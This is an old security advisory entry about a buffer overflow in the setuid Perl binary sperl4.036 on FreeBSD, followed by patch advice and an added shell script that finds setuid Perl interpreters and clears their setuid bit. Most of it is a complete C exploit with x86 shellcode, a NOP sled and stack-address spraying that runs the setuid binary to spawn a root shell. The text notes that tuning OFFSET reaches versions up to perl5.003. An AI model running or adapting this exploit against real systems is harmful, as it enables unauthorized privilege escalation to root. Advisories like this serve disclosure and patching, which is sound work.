1st Jan 1996 [SBWID-210]
COMMAND
	    sperl4.036
SYSTEMS AFFECTED
	    FreeBSD
PROBLEM
	    With a small modification of the OFFSET value, the exploit below
	    can overflow all versions up to perl5.003.  Credit for this goes
	    to OVX [email protected], who made this exploit available.
	
	    /************************************************************/
	    /*   Exploit for FreeBSD sperl4.036 by OVX                  */
	    /************************************************************/
	    #include <stdio.h>
	    #include <stdlib.h>
	    #include <unistd.h>
	    #define BUFFER_SIZE     1400
	    #define OFFSET          600
	    char *get_esp(void) {
	        asm("movl %esp,%eax");
	    }
	    char buf[BUFFER_SIZE];
	    main(int argc, char *argv[])
	    {
	            int i;
	            char execshell[] =
	            "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
	            "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
	            "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
	            "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
	            for(i=0+1;i<BUFFER_SIZE-4;i+=4)
	              *(char **)&buf[i] = get_esp() - OFFSET;
	            memset(buf,0x90,768+1);
	            memcpy(&buf[768+1],execshell,strlen(execshell));
	            buf[BUFFER_SIZE-1]=0;
	            execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
	    }
	
SOLUTION
	    Obtain  and  install  the  appropriate  patch  according  to   the
	    instructions included with the  patch. If you have  installed Perl
	    from source code, you should install source code patches.  Patches
	    are available from the  CPAN (Comprehensive Perl Archive  Network)
	    archives.  You may also remove the suid bit until then.
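
The interim mitigation above (removing the suid bit until the patch is installed) can be scripted. This is an added example, not part of the original advisory: the directory list and the `suidperl*` name pattern are assumptions, while `sperl*` matches the `/usr/bin/sperl4.036` path used on this page.

```shell
#!/bin/sh
# Added example: audit for setuid Perl interpreters and optionally clear the bit.
# DIRS and the suidperl* pattern are assumptions; adjust them for the host.

# find_suid_perl DIR...: print each setuid regular file named like a
# setuid Perl interpreter (sperl*, suidperl*). Unreadable subdirectories
# are skipped silently.
find_suid_perl() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -type f -perm -4000 \
            \( -name 'sperl*' -o -name 'suidperl*' \) -print 2>/dev/null || :
    done
}

# strip_suid_perl DIR...: clear the setuid bit on each match and print the
# files that were changed. Succeeds only if no match is left setuid.
strip_suid_perl() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        # -print runs only when chmod succeeded for that file.
        find "$dir" -type f -perm -4000 \
            \( -name 'sperl*' -o -name 'suidperl*' \) \
            -exec chmod u-s {} \; -print 2>/dev/null || :
    done
    [ -z "$(find_suid_perl "$@")" ]
}

# Default is report-only; pass "strip" as the first argument to clear the bit.
DIRS="/usr/bin /usr/local/bin /usr/sbin"   # assumed install locations
case "${1:-report}" in
    strip) strip_suid_perl $DIRS ;;
    *)     find_suid_perl $DIRS ;;
esac
```

Scripts that rely on setuid Perl stop working with elevated privileges once the bit is cleared, so restore it only after the patched interpreter is installed.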
	
